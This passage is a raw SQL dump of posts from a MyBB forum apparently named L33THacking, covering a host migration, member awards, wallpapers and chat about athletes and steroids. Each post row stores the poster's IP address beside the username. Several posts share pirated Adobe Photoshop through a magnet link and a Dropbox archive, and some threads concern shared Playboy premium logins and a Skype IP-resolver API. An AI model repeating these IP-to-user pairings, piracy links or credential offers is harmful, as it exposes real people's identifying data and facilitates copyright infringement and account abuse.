mask, you been granted the SWAG award. Enjoy.', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', '564361a5309e36ee59ae93f8fdb73d90', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('806', '187', '640', '3', 'RE: Public Downloads?', '0', '1', 't3h jok3r', '1345847679', 'Sure, I will try coding a plugin. I\'m sure there was a mycode for this though.', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', '47e6b113e6cd613c1192919fb7ecf3f9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('807', '196', '767', '3', 'RE: IMPORTANT ANNOUNCEMENT!!!', '0', '1', 't3h jok3r', '1345847712', '[quote=\'iTzIpod\' pid=\'767\' dateline=\'1345822689\'] [quote=\'t3h jok3r\' pid=\'766\' dateline=\'1345822280\'] [quote=\'iTzIpod\' pid=\'762\' dateline=\'1345821490\'] [quote=\'t3h jok3r\' pid=\'703\' dateline=\'1345768309\'] [quote=\'iTzIpod\' pid=\'701\' dateline=\'1345767787\'] True. But hopefully this new host migration will have better host than this current one. By the way may I ask which host we are currently using? [/quote] Sorry I can not say what host we are currently on due to some security reasons. But after the migrating I will surely let you know, my hosting I\'m on now is fairly new and kinda cheap but our new host has been out there for 3+ years with good reviews. [/quote] Oh. Alright :) What about this new host? :3 [/quote] Umm, it\'s fast and we will migrate before Saturday. [/quote] Can you tell me what host we are going to use? Or is that a no no? [/quote] Sorry I can\'t but I can let you know what hosting we were on.', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', '9171b488c81abc707a934dda21bf6e42', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('808', '197', '804', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1345847742', '[quote=\'t3h jok3r\' pid=\'804\' dateline=\'1345847529\'] * t3h jok3r I think I\'m doing this right this time. [/quote] /me congratulates t3h jok3r with a pat on the back and a cookie. [img]http://upload.wikimedia.org/wikipedia/commons/4/42/Cookie.gif[/img] Here is your cookie!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9dd5b41856cc3367a31e44ba63ba2ea9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('809', '204', '793', '29', 'RE: [FREE]Skype Resolver API', '0', '1', 't3h jok3r', '1345847855', '[quote=\'HoverCatz\' pid=\'793\' dateline=\'1345835031\'] API Is down now O.o \"fuck No Posting Private Shit of mine - Blic API BANNED - Arron XR\" [/quote] The thread layout was Blics but I got the API from Mr. Furioz. Anyway, sorry guys I guys the API is down so I\'m going to close this giveaway.', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', '4970e307ad98f39f91959aac228320e0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('810', '43', '779', '7', 'RE: How did you find us?', '0', '1', 't3h jok3r', '1345847940', '[quote=\'Apathy\' pid=\'779\' dateline=\'1345826158\'] I helped start it with you... :P [/quote] I remember this part and the time when I introduced you to Reborn. [quote=\'iTzIpod\' pid=\'768\' dateline=\'1345822951\'] [quote=\'t3h jok3r\' pid=\'763\' dateline=\'1345821692\'] [quote=\'iTzIpod\' pid=\'627\' dateline=\'1345668585\'] What? What do you mean took my username? :o [/quote] You said \"I\'m from t3h jok3r\" [/quote] Oh. I meant it as in you referred me :3 Since I came from TP. And your username is L33t Hacking on TP. [/quote] Lol now I get it ;)', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', 'b453946e87eeee03a9e921325637e1b4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('811', '184', '622', '35', 'RE: [Video] I\'m a video editor!', '0', '1', 't3h jok3r', '1345847969', 'I wish I could view videos :(', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', '013427855dcadca40e5862413b2f0daf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('812', '206', '805', '7', 'RE: Apply for SWAG', '0', '67', 'HoverCatz', '1345848103', '[quote=\'t3h jok3r\' pid=\'805\' dateline=\'1345847642\'] Nice mask, you been granted the SWAG award. Enjoy. [/quote] Thanks bro :D', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'be474fafdaefe5dcca97473e0743b4d1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('813', '200', '774', '55', 'RE: [Request] Adobe Photoshop CS6 Portable', '0', '82', 'iTzIpod', '1345848127', '[quote=\'Apathy\' pid=\'774\' dateline=\'1345825644\'] Torrent his: magnet:?xt=urn:btih:1F70593D167F733FFB3093673EE86E850525FAB0&dn=Adobe%20Photoshop%20CS6%2013.0%20Multilingual%20%28Portable%29&tr=udp%3a//tracker.openbittorrent.com%3a80 It is working and is cs6 portable. Seems clean but runs amazingly in sandboxie. [/quote] That\'s one huge link! :o But I will give it a try.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '64a6eac870441c1554edf36a6735b7da', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('814', '200', '753', '55', 'RE: [Request] Adobe Photoshop CS6 Portable', '0', '1', 't3h jok3r', '1345848129', '[quote=\'iTzIpod\' pid=\'753\' dateline=\'1345818053\'] [quote=\'t3h jok3r\' pid=\'746\' dateline=\'1345817347\'] http://dl.dropbox.com/u/26951938/Photoshop.rar It\'s CS5 though, also It\'s clean. I checked the virus total scan before downloading and the sandbox control panel seems to be OK. ENJOY! [/quote] Is it Portable? :3 Or just the regular Adobe Photoshop CS5? Or Extended? Etc. [/quote] It\'s :opps: Ummm :thinking: Portable I guess cause it\'s basically a zip with a lot of files and the main PS program is in the zip. All you have to do is extract the content and open up PS to start using it.', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', '22ef59240700278c81cd88a39ba99feb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('815', '206', '812', '7', 'RE: Apply for SWAG', '0', '1', 't3h jok3r', '1345848187', '[quote=\'HoverCatz\' pid=\'812\' dateline=\'1345848103\'] [quote=\'t3h jok3r\' pid=\'805\' dateline=\'1345847642\'] Nice mask, you been granted the SWAG award. Enjoy. [/quote] Thanks bro :D [/quote] No problem. You deserved it after all.', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', 'e721b2cbbeba765d9b6dd817a47ddcbc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('816', '181', '605', '54', 'RE: Fresh 22 Aug HoT [ Brazzers / Mofos / Xhamster / Youjizz .... MorE ] HoT', '0', '1', 't3h jok3r', '1345848333', 'But GFrevenge works :D Sorry for the dead links people.', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', 'a2eb6a7041ff3dcd3cfc00929a488859', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('817', '184', '811', '35', 'RE: [Video] I\'m a video editor!', '0', '82', 'iTzIpod', '1345848351', '[quote=\'t3h jok3r\' pid=\'811\' dateline=\'1345847969\'] I wish I could view videos :( [/quote] Is that because of the slow internet connection?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '60ed78a8221a05966476eda8eb0789be', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('818', '201', '784', '42', 'RE: Lance armstrong stripped of 7 tour titles?', '0', '1', 't3h jok3r', '1345848409', '[quote=\'NXK\' pid=\'784\' dateline=\'1345829671\'] [quote=\'iTzIpod\' pid=\'760\' dateline=\'1345820478\'] [quote=\'t3h jok3r\' pid=\'757\' dateline=\'1345819163\'] Too much to read but I got the Idea. I\'m sure 90% athletes do drugs (Ex: Steroids) or some other kind to get more energy to cheat. [/quote] Agreed. All I wanna know is how they don\'t get caught :3 [/quote] Certain steroids can be flushed from your system fast, It just depends how fast the athlete needs them out of his system. it just depends what kind of steroid they\'re using. [/quote] Oh, people please be aware of NXK because he is smarter than me. JK, I honestly didn\'t know that but doesn\'t it slow down your body?', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', 'ddeffbac36ff8d3f4484604b43ff424f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('819', '209', '0', '35', 'Sick Mozilla Firefox Wallpaper/Desktop Background', '0', '82', 'iTzIpod', '1345848449', 'I found this on the interwebs. :p Enjoy! Click [url=http://i1270.photobucket.com/albums/jj612/iTzIpod/MozillaFireFoxWallpaper.jpg] Here[/url] to view To Download: 1. Right Click Image 2. Save Image As... 3. Locate Image 4. Set as Desktop Background Preview [Spoiler] [img]http://i1270.photobucket.com/albums/jj612/iTzIpod/MozillaFireFoxWallpaper.jpg[/img][/Spoiler]', '24.212.197.164', '416597412', '1', '0', '82', '1345848519', '1', '6f4afff943a93ca245334122f0dd2c3e', '0', '1345848519'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('820', '208', '794', '7', 'RE: I m feeling happy ;)', '0', '1', 't3h jok3r', '1345848462', '[quote=\'iTzIpod\' pid=\'794\' dateline=\'1345836146\'] Your post is censored . [/quote] The only word we have censored is HF. So the OP left HF. Thanks Sin Cara for helping out LH.', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', 'b8cdb5bcc3e6d25607be5c2cd28a458c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('821', '183', '620', '54', 'RE: 2x PlayBoy Premium', '0', '1', 't3h jok3r', '1345848512', 'So where can I use these logins?', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', 'cf520815dab810d0e1b6d5504ec536b3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('822', '209', '819', '35', 'RE: Sick Mozilla Firefox Wallpaper/Desktop Background', '0', '1', 't3h jok3r', '1345848729', 'Dude, I just downloaded this and set it as my BG and it looks sick. It goes along with my PC now because I have the custom FBI screen with jokers (Batman) picture as user account picture and now my background. Thanks a lot man.', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', '57888d0d891dc0e42962fa56a509cd9f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('823', '184', '817', '35', 'RE: [Video] I\'m a video editor!', '0', '1', 't3h jok3r', '1345848802', '[quote=\'iTzIpod\' pid=\'817\' dateline=\'1345848351\'] [quote=\'t3h jok3r\' pid=\'811\' dateline=\'1345847969\'] I wish I could view videos :( [/quote] Is that because of the slow internet connection? [/quote] Yup, that\'s correct. I can\'t even watch my favourite TV show, which is prison break.', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', '920f7044542032b57f445f16e84af0f5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('824', '183', '620', '54', 'RE: 2x PlayBoy Premium', '0', '112', '??????Z', '1345848947', 'http://www.playboy.com .:)', '92.22.242.209', '1545007825', '0', '0', '0', '0', '1', 'e161b2124a388e972e7c53cb3ff85917', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('825', '209', '819', '35', 'RE: Sick Mozilla Firefox Wallpaper/Desktop Background', '0', '82', 'iTzIpod', '1345849379', 'No problem! Just here to help!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '56034fcc501dbb22cdb91f041c85dee7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('826', '184', '823', '35', 'RE: [Video] I\'m a video editor!', '0', '82', 'iTzIpod', '1345849582', '[quote=\'t3h jok3r\' pid=\'823\' dateline=\'1345848802\'] [quote=\'iTzIpod\' pid=\'817\' dateline=\'1345848351\'] [quote=\'t3h jok3r\' pid=\'811\' dateline=\'1345847969\'] I wish I could view videos :( [/quote] Is that because of the slow internet connection? [/quote] Yup, that\'s correct. I can\'t even watch my favourite TV show, which is prison break. [/quote] Lol I can give you a free Netflix account. You can watch Prison Break on it. Unless that won\'t work? :o', '24.212.197.164', '416597412', '1', '0', '82', '1345849644', '1', '24ca21087652faf15ba404647683741e', '0', '1345849644'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('827', '203', '739', '16', 'RE: [Limited] Free SEing Help', '0', '90', 'duhuh', '1345852212', 'yah first post, would love if you could help with razor? possibly thanks', '86.182.139.218', '1454803930', '0', '0', '0', '0', '1', 'c720b020785820fe214d399943651221', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('828', '196', '807', '3', 'RE: IMPORTANT ANNOUNCEMENT!!!', '0', '82', 'iTzIpod', '1345852526', '[quote=\'t3h jok3r\' pid=\'807\' dateline=\'1345847712\'] [quote=\'iTzIpod\' pid=\'767\' dateline=\'1345822689\'] [quote=\'t3h jok3r\' pid=\'766\' dateline=\'1345822280\'] [quote=\'iTzIpod\' pid=\'762\' dateline=\'1345821490\'] [quote=\'t3h jok3r\' pid=\'703\' dateline=\'1345768309\'] Sorry I can not say what host we are currently on due to some security reasons. But after the migrating I will surely let you know, my hosting I\'m on now is fairly new and kinda cheap but our new host has been out there for 3+ years with good reviews. [/quote] Oh. Alright :) What about this new host? :3 [/quote] Umm, it\'s fast and we will migrate before Saturday. [/quote] Can you tell me what host we are going to use? Or is that a no no? [/quote] Sorry I can\'t but I can let you know what hosting we were on. [/quote] Alright. It\'s cool.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c9e47d465ee1029512bdaa61454e1e98', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('829', '201', '818', '42', 'RE: Lance armstrong stripped of 7 tour titles?', '0', '61', 'NXK', '1345852575', '[quote=\'t3h jok3r\' pid=\'818\' dateline=\'1345848409\'] [quote=\'NXK\' pid=\'784\' dateline=\'1345829671\'] [quote=\'iTzIpod\' pid=\'760\' dateline=\'1345820478\'] [quote=\'t3h jok3r\' pid=\'757\' dateline=\'1345819163\'] Too much to read but I got the Idea. I\'m sure 90% athletes do drugs (Ex: Steroids) or some other kind to get more energy to cheat. [/quote] Agreed. All I wanna know is how they don\'t get caught :3 [/quote] Certain steroids can be flushed from your system fast, It just depends how fast the athlete needs them out of his system. it just depends what kind of steroid they\'re using. [/quote] Oh, people please be aware of NXK because he is smarter than me. JK, I honestly didn\'t know that but doesn\'t it slow down your body? [/quote] No it doesn\'t, How they take steroids is alot different than most people think. They go on what\'s called a \"cycle\" which is where they will take there steroid of choice (Theres ton\'s of kinds) And they will only take it for a month time. After a month they stop but keep training. In another 3 months they will repeat the process.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'c36e82c57bf31f7b87f0524e0f5a06d5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('830', '139', '356', '12', 'RE: Get 60 Minutes skype credit FREE!', '0', '90', 'duhuh', '1345852681', 'still down, which is a shame.', '86.182.139.218', '1454803930', '0', '0', '0', '0', '1', 'a38d3eca1f03a293b967006b0554acba', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('831', '78', '187', '7', 'RE: Dota 2 beta keys giveawat!', '0', '61', 'NXK', '1345852758', 'Dota 2 is a stand alone version of the game dota which was a mod of warcraft 3. It\'s a moba style game somewhat like league of legends.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '4d119eeb9acdc024761f87394bf41bde', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('832', '43', '810', '7', 'RE: How did you find us?', '0', '82', 'iTzIpod', '1345853213', '[quote=\'t3h jok3r\' pid=\'810\' dateline=\'1345847940\'] [quote=\'Apathy\' pid=\'779\' dateline=\'1345826158\'] I helped start it with you... :P [/quote] I remember this part and the time when I introduced you to Reborn. [quote=\'iTzIpod\' pid=\'768\' dateline=\'1345822951\'] [quote=\'t3h jok3r\' pid=\'763\' dateline=\'1345821692\'] [quote=\'iTzIpod\' pid=\'627\' dateline=\'1345668585\'] What? What do you mean took my username? :o [/quote] You said \"I\'m from t3h jok3r\" [/quote] Oh. I meant it as in you referred me :3 Since I came from TP. And your username is L33t Hacking on TP. [/quote] Lol now I get it ;) [/quote] Sorry for the mix up =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5132ed393d49f1ae4f05ed21de09c559', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('833', '206', '815', '7', 'RE: Apply for SWAG', '0', '82', 'iTzIpod', '1345853367', '[quote=\'t3h jok3r\' pid=\'815\' dateline=\'1345848187\'] [quote=\'HoverCatz\' pid=\'812\' dateline=\'1345848103\'] [quote=\'t3h jok3r\' pid=\'805\' dateline=\'1345847642\'] Nice mask, you been granted the SWAG award. Enjoy. [/quote] Thanks bro :D [/quote] No problem. You deserved it after all. [/quote] You gotta post a picture of yourself on the forum looking all swag just to receive the award?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1bfead693d8562d3434aa645e05acbd2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('834', '208', '820', '7', 'RE: I m feeling happy ;)', '0', '82', 'iTzIpod', '1345853440', '[quote=\'t3h jok3r\' pid=\'820\' dateline=\'1345848462\'] [quote=\'iTzIpod\' pid=\'794\' dateline=\'1345836146\'] Your post is censored . [/quote] The only word we have censored is HF. So the OP left HF. Thanks Sin Cara for helping out LH. [/quote] Oh alright. Congratulations on leaving that forum! So much repfuckers. -.-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd31a373f07baa6fc8769a61dbe1849d3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('835', '210', '0', '3', 'Moved Successfully!!!', '0', '1', 't3h jok3r', '1345853465', 'L33THacking has moved to a new host successfully. For the first few minutes I wasn\'t able to access the Admin Control Panel but I figured out what I did wrong. LH will now load faster, hardly any downtimes and emails will work properly. Emails include activation emails and support emails through the contact form. I have a lot of edit tonight, hopefully I get done by tomorrow. You could still PM me, I would concentrate more on PMs than edits :D', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', 'f74008b3e236eb27d652a1570ab1d3ee', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('836', '196', '693', '3', 'RE: IMPORTANT ANNOUNCEMENT!!!', '0', '1', 't3h jok3r', '1345853495', 'Please visit the link below for the update on our new host. http://l33thacking.com/showthread.php?tid=210', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', '5706c51501e546b6f7a2bca4e58526f1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('837', '210', '835', '3', 'RE: Moved Successfully!!!', '0', '82', 'iTzIpod', '1345853611', 'Thank God. Woot. Hope this host will be 500x faster.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd661eb2f883d7099cb28f11854820c36', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('838', '207', '776', '3', 'RE: Suggest awards and apply for awads.', '0', '1', 't3h jok3r', '1345854491', 'Award Name: Rep Whore Award Description: Self-explanatory How to obtain: People in this group have 20 or more positive reps only. No neg or neutrals. Image: Can it get approved first?', '41.174.60.179', '699284659', '1', '0', '1', '1345854508', '1', '9fff14ca992306d5c3f4dad0ca8b6e9b', '0', '1345854508'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('839', '208', '834', '7', 'RE: I m feeling happy ;)', '0', '1', 't3h jok3r', '1345854645', '[quote=\'iTzIpod\' pid=\'834\' dateline=\'1345853440\'] [quote=\'t3h jok3r\' pid=\'820\' dateline=\'1345848462\'] [quote=\'iTzIpod\' pid=\'794\' dateline=\'1345836146\'] Your post is censored . [/quote] The only word we have censored is HF. So the OP left HF. Thanks Sin Cara for helping out LH. [/quote] Oh alright. Congratulations on leaving that forum! So much repfuckers. -.- [/quote] I agree, I also started hating HF because they have too much dead post here and PM mes and people are lazy to learn real hacking.', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', 'd866ddb6fce8f9557a4261f5bbda975f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('840', '139', '356', '12', 'RE: Get 60 Minutes skype credit FREE!', '0', '54', 'Sin Cara', '1345856086', 'Thread is closed due to link down ;) Sorry for the inconvenience!', '119.154.20.73', '2006586441', '1', '0', '0', '0', '1', '8cbc5fc8450ad2e9a2ce1c882d7384d6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('841', '183', '821', '54', 'RE: 2x PlayBoy Premium', '0', '54', 'Sin Cara', '1345856140', '[quote=\'t3h jok3r\' pid=\'821\' dateline=\'1345848512\'] So where can I use these logins? [/quote] http://www.playboy.com ;)', '119.154.20.73', '2006586441', '1', '0', '0', '0', '1', '94dabc745093f7741eed7b576544d6a4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('842', '208', '788', '7', 'RE: I m feeling happy ;)', '0', '54', 'Sin Cara', '1345856193', 'Thanks every for their feedback ;)', '119.154.20.73', '2006586441', '1', '0', '0', '0', '1', 'fe32ba96c1a57434720dd13d93fd8e79', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('843', '207', '776', '3', 'RE: Suggest awards and apply for awads.', '0', '82', 'iTzIpod', '1345856916', 'Award Name: Post Whore Award Description: Self-explanatory How to obtain: Obtain 100 Posts. Posts must be HQ. No LQ posts. Image: http://i.imgur.com/c7vuI.png [img]http://i.imgur.com/c7vuI.png[/img]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '73c4285791601f72bf3e8a355ff441f3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('844', '211', '0', '3', '[Announcement] Marketplace Removed', '0', 